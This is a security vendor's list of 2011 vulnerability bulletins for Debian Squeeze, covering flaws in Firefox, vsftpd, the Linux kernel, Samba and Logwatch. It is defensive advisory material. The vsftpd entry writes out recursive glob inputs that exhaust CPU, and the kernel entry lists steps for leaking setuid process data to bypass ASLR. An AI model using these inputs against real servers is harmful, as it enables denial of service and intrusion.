The Vigil@nce team watches public vulnerabilities impacting your computers, and then offers security solutions, a database and tools to fix them.

Computer vulnerabilities of Debian Squeeze

vulnerability bulletin CVE-2010-1585 CVE-2011-0051 CVE-2011-0053

Firefox, SeaMonkey: several vulnerabilities

Synthesis of the vulnerability

Several vulnerabilities of Firefox and SeaMonkey can be used by an attacker to execute code on victim's computer.
Impacted products: Debian, Fedora, Mandriva Linux, Firefox, SeaMonkey, OpenSolaris, openSUSE, Solaris, RHEL, Slackware, SLES.
Severity: 4/4.
Consequences: user access/rights.
Provenance: document.
Number of vulnerabilities in this bulletin: 10.
Creation date: 02/03/2011.
Identifiers: 558531, 558541, 558633, 562547, 563243, 563618, 569384, 573873, 576649, 596232, 599610, 600853, 600974, 602115, 605672, 607160, 610601, 613376, 614499, 615657, 616009, 616659, 619255, 622015, 626631, BID-46368, BID-46643, BID-46645, BID-46647, BID-46648, BID-46650, BID-46651, BID-46652, BID-46660, BID-46661, BID-46663, CERTA-2011-AVI-127, CVE-2010-1585, CVE-2011-0051, CVE-2011-0053, CVE-2011-0054, CVE-2011-0055, CVE-2011-0056, CVE-2011-0057, CVE-2011-0058, CVE-2011-0059, CVE-2011-0061, CVE-2011-0062, DSA-2180-1, DSA-2186-1, DSA-2186-2, DSA-2187-1, FEDORA-2011-2796, FEDORA-2011-2797, MDVSA-2011:041, MFSA 2011-01, MFSA 2011-02, MFSA 2011-03, MFSA 2011-04, MFSA 2011-05, MFSA 2011-06, MFSA 2011-07, MFSA 2011-08, MFSA 2011-09, MFSA 2011-10, openSUSE-SU-2011:0169-1, openSUSE-SU-2014:1100-1, RHSA-2011:0310-01, RHSA-2011:0313-01, SSA:2011-060-01, SSA:2011-068-01, SSA:2011-068-02, SUSE-SA:2011:013, VIGILANCE-VUL-10413, ZDI-11-103.

Description of the vulnerability

Several vulnerabilities were announced in Firefox and SeaMonkey.

An attacker can use several memory corruption leading to code execution. [severity:4/4; 558531, 558541, 558633, 563243, 563618, 569384, 576649, 596232, 599610, 600853, 600974, 602115, 605672, 613376, 614499, BID-46645, BID-46647, CVE-2011-0053, CVE-2011-0062, MFSA 2011-01]

An attacker can use the eval() function recursively, in order to force the acceptation of dialog windows. [severity:4/4; 616659, BID-46643, CVE-2011-0051, MFSA 2011-02]

The JSON.stringify() function can use a freed memory area, which leads to code execution. [severity:4/4; 616009, 619255, BID-46661, CVE-2011-0055, MFSA 2011-03, ZDI-11-103]

An attacker can use non local JavaScript variables, in order to create a buffer overflow in upvarMap. [severity:4/4; 615657, BID-46648, CVE-2011-0054, MFSA 2011-04]

An attacker can use a JavaScript program with more than 64k string variables, in order to create a buffer overflow. [severity:4/4; 622015, BID-46650, CVE-2011-0056, MFSA 2011-05]

A JavaScript Worker can use a freed memory area, which leads to code execution. [severity:4/4; 626631, BID-46663, CVE-2011-0057, MFSA 2011-06]

An attacker can insert long strings in an HTML document, in order to corrupt the memory. [severity:4/4; 607160, BID-46660, CVE-2011-0058, MFSA 2011-07]

The ParanoidFragmentSink class does not filter "javascript:" urls in JavaScript documents. [severity:2/4; 562547, CERTA-2011-AVI-127, CVE-2010-1585, MFSA 2011-08]

A malicious JPEG image corrupts the memory. [severity:4/4; 610601, BID-46651, CVE-2011-0061, MFSA 2011-09]

An attacker can use a 307 redirect, in order to create a Cross Site Request Forgery. [severity:3/4; 573873, BID-46652, CVE-2011-0059, MFSA 2011-10]

The most severe vulnerabilities lead to code execution.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability CVE-2011-0762

vsftpd: denial of service via a pattern

Synthesis of the vulnerability

An attacker can use a special file name, in order to force vsftpd to consume a lot of processor resources.
Impacted products: Debian, Fedora, Mandriva Linux, openSUSE, RHEL, SLES, vsftpd.
Severity: 3/4.
Consequences: denial of service on service.
Provenance: internet client.
Creation date: 16/02/2011.
Revision date: 01/03/2011.
Identifiers: BID-46617, CVE-2011-0762, DSA-2305-1, FEDORA-2011-2590, FEDORA-2011-2615, MDVSA-2011:049, openSUSE-SU-2011:0435-1, RHSA-2011:0337-01, SUSE-SR:2011:009, VIGILANCE-VUL-10375, VU#590604.

Description of the vulnerability

A vsftpd client can use a regular expression in order to search a filename. For example:
  LIST file*.txt

However, this regular expression can be constructed to use a deep recursion. For example:
  LIST {{*},...}
  LIST {{*},{{*},...}}
  LIST {{*},{{*},{{*},...}}}
  etc.

An attacker can therefore use a special file name, in order to force vsftpd to consume a lot of processor resources.

This vulnerability is different from VIGILANCE-VUL-10010.
Full Vigil@nce bulletin... (Free trial)

vulnerability CVE-2011-1080

Linux kernel: memory reading via ebtables

Synthesis of the vulnerability

A local attacker with the CAP_NET_ADMIN capability can replace an ebtables rule, in order to read the memory or to create a denial of service.
Impacted products: Debian, Linux, openSUSE, RHEL, SUSE Linux Enterprise Desktop, SLES, ESX.
Severity: 1/4.
Consequences: data reading, denial of service on server.
Provenance: user shell.
Creation date: 01/03/2011.
Identifiers: BID-46616, CVE-2011-1080, DSA-2240-1, DSA-2264-1, openSUSE-SU-2012:0236-1, RHSA-2011:0498-01, RHSA-2011:0500-01, RHSA-2011:0833-01, SUSE-SA:2011:031, SUSE-SU-2011:0832-1, VIGILANCE-VUL-10410.

Description of the vulnerability

When Linux is used in Bridge mode, the network administrator can use the ebtables firewall tool to define network rules.

The do_replace() function of the net/bridge/netfilter/ebtables.c file replaces a rule. However, this function does not check if the device name ends with a '\0' character. The kernel then continues to read data coming from its memory, until it finds a null character or until a segmentation error occurs. These data are given to try_then_request_module(), and then to the modprobe command, so they can be read via the ps command.

A local attacker with the CAP_NET_ADMIN capability can therefore replace an ebtables rule, in order to read the memory or to create a denial of service.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability note CVE-2011-1079

Linux kernel: denial of service via bluetooth bnep

Synthesis of the vulnerability

A local attacker with the CAP_NET_ADMIN capability can use an ioctl on a Bluetooth BNEP socket, in order to read the memory or to create a denial of service.
Impacted products: Debian, Fedora, Linux, RHEL, SUSE Linux Enterprise Desktop, SLES, ESX.
Severity: 1/4.
Consequences: data reading, denial of service on server.
Provenance: user shell.
Creation date: 01/03/2011.
Identifiers: BID-46616, CVE-2011-1079, DSA-2240-1, DSA-2264-1, FEDORA-2011-6447, FEDORA-2011-6541, RHSA-2011:0498-01, RHSA-2011:0500-01, RHSA-2011:0833-01, SUSE-SA:2011:031, SUSE-SU-2011:0832-1, VIGILANCE-VUL-10409.

Description of the vulnerability

The BNEP (Bluetooth Network Encapsulation Protocol) protocol encapsulates IP data on L2CAP (Logical Link Control and Adaptation Protocol).

The bnep_sock_ioctl() function of the net/bluetooth/bnep/sock.c file implements ioctls on BNEP sockets. However, this function does not check if the device name ends with a '\0' character. The kernel then continues to copy data coming from its memory, until it finds a null character or until a segmentation error occurs.

A local attacker with the CAP_NET_ADMIN capability can therefore use an ioctl on a Bluetooth BNEP socket, in order to read the memory or to create a denial of service.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability bulletin CVE-2011-1078

Linux kernel: memory reading via bluetooth sco

Synthesis of the vulnerability

A local attacker can query a Bluetooth socket, in order to read one byte coming from the kernel memory.
Impacted products: Debian, Linux, RHEL, SUSE Linux Enterprise Desktop, SLES, ESX.
Severity: 1/4.
Consequences: data reading.
Provenance: user shell.
Creation date: 01/03/2011.
Identifiers: BID-46616, CVE-2011-1078, DSA-2240-1, DSA-2264-1, RHSA-2011:0500-01, RHSA-2011:0833-01, RHSA-2012:1156-01, SUSE-SA:2011:031, SUSE-SU-2011:0832-1, VIGILANCE-VUL-10408.

Description of the vulnerability

The net/bluetooth/sco.c file implements the support of Bluetooth SCO (Synchronous Connection Oriented) used for voice.

The getsockopt() function returns to the user information about a socket. The sco_sock_getsockopt_old() function generates these information for Bluetooth SCO sockets.

However, sco_sock_getsockopt_old() does not initialize one byte of the sco_conninfo structure.

A local attacker can therefore query a Bluetooth socket, in order to read one byte coming from the kernel memory.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability CVE-2011-0719

Samba: memory corruption via FD_SET

Synthesis of the vulnerability

An attacker can open several files on a Samba share, in order to stop the service, and possibly to execute code.
Impacted products: Debian, Fedora, HP-UX, Mandriva Linux, openSUSE, Solaris, RHEL, Samba, Slackware, SLES.
Severity: 2/4.
Consequences: user access/rights, denial of service on service.
Provenance: intranet client.
Creation date: 28/02/2011.
Identifiers: 670431, 7949, BID-46597, c02787667, CERTA-2011-AVI-120, CVE-2011-0719, DSA-2175-1, FEDORA-2011-3118, FEDORA-2011-3120, HPSBUX02657, MDVSA-2011:038, openSUSE-SU-2011:0403-1, RHSA-2011:0305-01, RHSA-2011:0306-01, SSA:2011-059-01, SSRT100460, SUSE-SR:2011:008, VIGILANCE-VUL-10405.

Description of the vulnerability

The select() system call monitors events (read/write) on a list of file descriptors (a "fd_set").

A fd_set is an array containing FD_SETSIZE items. The FD_SET(fd, &the_fd_set) macro indicates that the file descriptor number "fd" has to be monitored in a fd_set. In order to do so, it sets a flag at index fd of the fd_set array.

An application which uses FD_SET() has to check that the number of the file descriptor is positive and inferior to FD_SETSIZE (otherwise FD_SET sets the flag outside the array). However, several Samba functions do not do this check. This error case occurs when several files are opened (fd >= FD_SETSIZE) or if an open operation failed (fd == -1).

An attacker can therefore open several files on a Samba share, in order to stop the service, and possibly to execute code.
Full Vigil@nce bulletin... (Free trial)

vulnerability announce CVE-2011-1018

Logwatch: code execution via a file name

Synthesis of the vulnerability

An attacker can create a log file with a special name, in order to force Logwatch to execute malicious code with root privileges.
Impacted products: Debian, Fedora, openSUSE, RHEL, SLES, Unix (platform) ~ not comprehensive.
Severity: 2/4.
Consequences: administrator access/rights.
Provenance: user shell.
Creation date: 25/02/2011.
Identifiers: 3184223, CERTA-2011-AVI-163, CVE-2011-1018, DSA-2182-1, FEDORA-2011-2318, FEDORA-2011-2328, openSUSE-SU-2011:0242-1, RHSA-2011:0324-01, SUSE-SR:2011:005, VIGILANCE-VUL-10402.

Description of the vulnerability

The Logwatch program analyzes system log files, in order to detect errors.

The logwatch.pl script executes with root privileges a shell command containing the filename:
  cat log_file ...
However, the filename is not filtered before being inserted in the shell command. An attacker can thus use an escape character in order to execute another shell command.

In order to exploit this vulnerability, the attacker has to create a new log file. For example, the Samba server creates files with users' names.

An attacker can therefore create a log file with a special name, in order to force Logwatch to execute malicious code with root privileges.
Full Vigil@nce bulletin... (Free trial)

vulnerability CVE-2011-1020

Linux kernel: information disclosure on a setuid

Synthesis of the vulnerability

A local attacker can read a file on /proc, in order to obtain information on a setuid program.
Impacted products: Debian, Linux, openSUSE, RHEL, SUSE Linux Enterprise Desktop, SLES, ESX.
Severity: 1/4.
Consequences: data reading.
Provenance: user shell.
Creation date: 25/02/2011.
Identifiers: BID-46567, CERTA-2003-AVI-005, CERTA-2012-AVI-479, CVE-2011-1020, DSA-2303-1, DSA-2303-2, DSA-2310-1, ESX400-201209001, ESX400-201209401-SG, ESX400-201209402-SG, ESX400-201209404-SG, ESX410-201208101-SG, ESX410-201208102-SG, ESX410-201208103-SG, ESX410-201208104-SG, ESX410-201208105-SG, ESX410-201208106-SG, ESX410-201208107-SG, openSUSE-SU-2011:0860-1, openSUSE-SU-2011:0861-1, RHSA-2011:1253-01, RHSA-2011:1530-03, RHSA-2012:0007-01, RHSA-2012:0116-01, SUSE-SA:2011:031, SUSE-SU-2011:0832-1, SUSE-SU-2011:1150-1, VIGILANCE-VUL-10400, VMSA-2012-0003.1, VMSA-2012-0005.2, VMSA-2012-0005.3, VMSA-2012-0008.1, VMSA-2012-0013, VMSA-2012-0013.1.

Description of the vulnerability

Functions of the exec() family replace the current process by a new process.

Files located under the /proc/[pid]/ directory contain information about the process. For example, the /proc/[pid]/auxv file contains information about the ELF interpreter, such as indications about ASLR.

An attacker can:
 - create a process
 - open its auxv file
 - use exec() to replace the process by a suid program
 - read the auxv file (he is allowed because the file was opened before)
Information in the auxv file are thus related to the suid program.

A local attacker can therefore read a file on /proc, in order to obtain information on a setuid program. This vulnerability can for example be used to bypass ASLR.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability bulletin CVE-2011-1016

Linux kernel: memory write via Radeon R300

Synthesis of the vulnerability

When the system has a Radeon R300 video device, a local attacker can send an AARESOLVE_OFFSET message, in order to write to the memory.
Impacted products: Debian, Linux, openSUSE, RHEL, SUSE Linux Enterprise Desktop, SLES.
Severity: 1/4.
Consequences: data creation/edition.
Provenance: user shell.
Creation date: 24/02/2011.
Identifiers: BID-46557, CVE-2011-1016, DSA-2240-1, openSUSE-SU-2011:0416-1, openSUSE-SU-2011:0861-1, RHSA-2011:0498-01, SUSE-SA:2011:019, SUSE-SA:2011:021, SUSE-SA:2011:026, SUSE-SA:2011:027, SUSE-SU-2011:0512-1, SUSE-SU-2011:0711-1, SUSE-SU-2011:0737-1, SUSE-SU-2011:1150-1, VIGILANCE-VUL-10398.

Description of the vulnerability

The drivers/gpu/drm/radeon/r300.c file implements the support of Radeon R300 video devices.

The RB3D_AARESOLVE_OFFSET message indicates to the video device where to place the memory area containing anti-aliasing (character font smoothing) data.

However, the r300_packet0_check() function does not check if the offset is too large.

When the system has a Radeon R300 video device, a local attacker can therefore send an AARESOLVE_OFFSET message, in order to write to the memory.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability announce CVE-2011-1017

Linux kernel: buffer overflow via ldm_frag_add

Synthesis of the vulnerability

An attacker can mount a device with a malicious Windows Logical Disk Manager partition, in order to corrupt the kernel memory, which leads to a denial of service or to code execution.
Impacted products: Debian, Linux, openSUSE, SUSE Linux Enterprise Desktop, SLES.
Severity: 2/4.
Consequences: administrator access/rights, privileged access/rights, user access/rights, denial of service on server.
Provenance: user console.
Number of vulnerabilities in this bulletin: 2.
Creation date: 24/02/2011.
Identifiers: BID-46512, CVE-2011-1012-REJECT, CVE-2011-1017, DSA-2264-1, openSUSE-SU-2011:0860-1, openSUSE-SU-2011:0861-1, PRE-SA-2011-01, SUSE-SA:2011:026, SUSE-SA:2011:027, SUSE-SA:2011:031, SUSE-SA:2011:034, SUSE-SA:2011:040, SUSE-SU-2011:0512-1, SUSE-SU-2011:0711-1, SUSE-SU-2011:0737-1, SUSE-SU-2011:0832-1, SUSE-SU-2011:0899-1, SUSE-SU-2011:0928-1, SUSE-SU-2011:1058-1, SUSE-SU-2011:1150-1, VIGILANCE-VUL-10397, ZDI-11-090.

Description of the vulnerability

The fs/partitions/ldm.c file implements the support of Windows Logical Disk Manager partitions. These partitions are automatically read when a user connects/mounts a device formatted with LDM.

The ldm_frag_add() function adds VBLK fields of a LDM partition to a linked list. The VBLK field is put in an allocated memory area. However, the size of this memory area is computed from a multiplication which can overflow. The VBLK field is thus copied in a memory area which is too short.

An attacker can therefore mount a device with a malicious Windows Logical Disk Manager partition, in order to corrupt the kernel memory, which leads to a denial of service or to code execution.
Full Vigil@nce bulletin... (Free trial)
Our database contains other pages. You can request a free trial to read them.

Display information about Debian Squeeze: